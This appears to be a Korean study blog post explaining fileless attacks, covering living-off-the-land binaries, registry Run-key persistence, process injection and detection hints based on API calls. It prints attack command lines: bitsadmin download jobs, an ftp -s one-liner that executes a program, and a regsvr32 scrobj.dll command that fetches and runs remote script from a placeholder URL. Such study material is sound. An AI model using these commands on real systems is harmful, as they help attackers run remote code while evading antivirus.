[Spear-Phishing] Fileless Attack

1. Fileless 공격의 특징

• 실행되는 코드가 파일로 생성되지 않고 메모리에만 존재하며, 흔적을 남기지 않는 유형의 공격
• 프로세스 인젝션 기술을 사용함
• LoL(Living off the Land) 바이너리들을 사용함
• 스크립팅
• 파일리스 퍼시스턴스

 디스크터치가 발생하지 않도록 하는 공격

 

안티바이러스 프로그램은 시스템(WritingAPI 함수 등)을 실시간으로 모니터링 하고 있기 때문에

 

디스크 터치를 통한 흔적을 남기지 않기 위해 Fileless 공격이 증가했다.

 

LoL Binary ( Living off the Land ) 

기존에 빌트인된 바이너리들 ( LoL Bins ) 

 

스크립팅의 경우는 빌트 인터프리터에게 스크립트 텍스트 파일을 전달한다.

 

그런 후 Powershell.exe와 같은 파일을 실행시키면

 

이미 있는 파일을 실행시킨 것이므로 해커의 소행인지 알 수 없게 된다.

 

마지막으로 Persistence는 Mitre Att&ck의 전술 중 하나로

 

시스템이 재부팅 됐을 때도 계속 코드가 실행될 수 있도록 하는 전략이다.

 

이 전술을 사용하는 대표적인 장소가 레지스트리인데,

 

HKLM 아래의 ~~~Run이라는 키에 어떠한 exe파일을 실행하도록 설정하면

 

재부팅 되었을 때에도 설정된 파일이 실행된다.

 

(전술들은 이곳에서 설명했다)

 

https://walk-cat-dev.tistory.com/127

[Spear-Phishing] MITRE ATT&CK Matrix

 

하지만 결국에는 exe파일이 디스크에 존재해야하므로 디스크 터치가 발생하게 된다.

 

---

2.  Attack Flow

 

Fileless 공격의 흐름 예시는 다음과 같다.

 

 

문서 속에 들어있는 난독화된 매크로 코드가 실행되면서 rundll32.exe를 실행한다.

 

rundll32는 DLL을 로딩시키고 실행하기 위한 호스팅 프로그램이다.

 

정상적인 서명 정보도 들어있으므로 악성코드라고 할 수도 없다.

 

rundll32는 DLL을 메모리 상에 바로 업로드를 하기 때문에 디스크 터치를 하지 않는다.

 

이후 이 DLL이 다른 프로세스의 코드를 실행한다.

 

---

3. Fileless Attack Example

 

Fileless 공격의 예시로는

 

1. bitsadmin.exe를 통한 파일 다운로드 혹은 지정파일 우회

 

bitsadmin /create
bitsadmin /addfile
bitsadmin /RESUME
bitsadmin /complete
bitsadmin /SetNotifyCmdLine

 

2. ftp.exe를 통한 공격 관련 프로그램 실행

 

echo !execute.exe > command.txt && ftp -s:command.txt

 

3. csc.exe, cmd.exe, bash.exe, at.exe 등의 바이너리

 

가 있다.

 

또한 Persistence를 얻기 위해 regsvr32를 이용할 수 있다.

 

regsvr32 /s /n /u /i:[URL, download JS] scrobj.dll

* /s : 메세지 박스 디스플레이 X
* /n : DLL 등록서버 호출 X
* /i : 등록될 DLL에게 전달될 CommandLine Parameter or Option
* /u : DLL을 서비스로 등록 X

 

프로세스 인젝션의 경우 주로 방어 우회나 권한 상승을 위해 사용된다.

 

디스크터치를 발생시키지 않으며, 특정 API를 호출한다.

 

따라서 OpenProces, VirtualAllocEx와 같은 API가 호출되었다면

 

디스크터치가 발생하지 않았음에도 인젝션을 의심해볼만하다.

 

WritieProcessMemory를 이용하여 페이로드를 기록하기도 하므로 참고하자.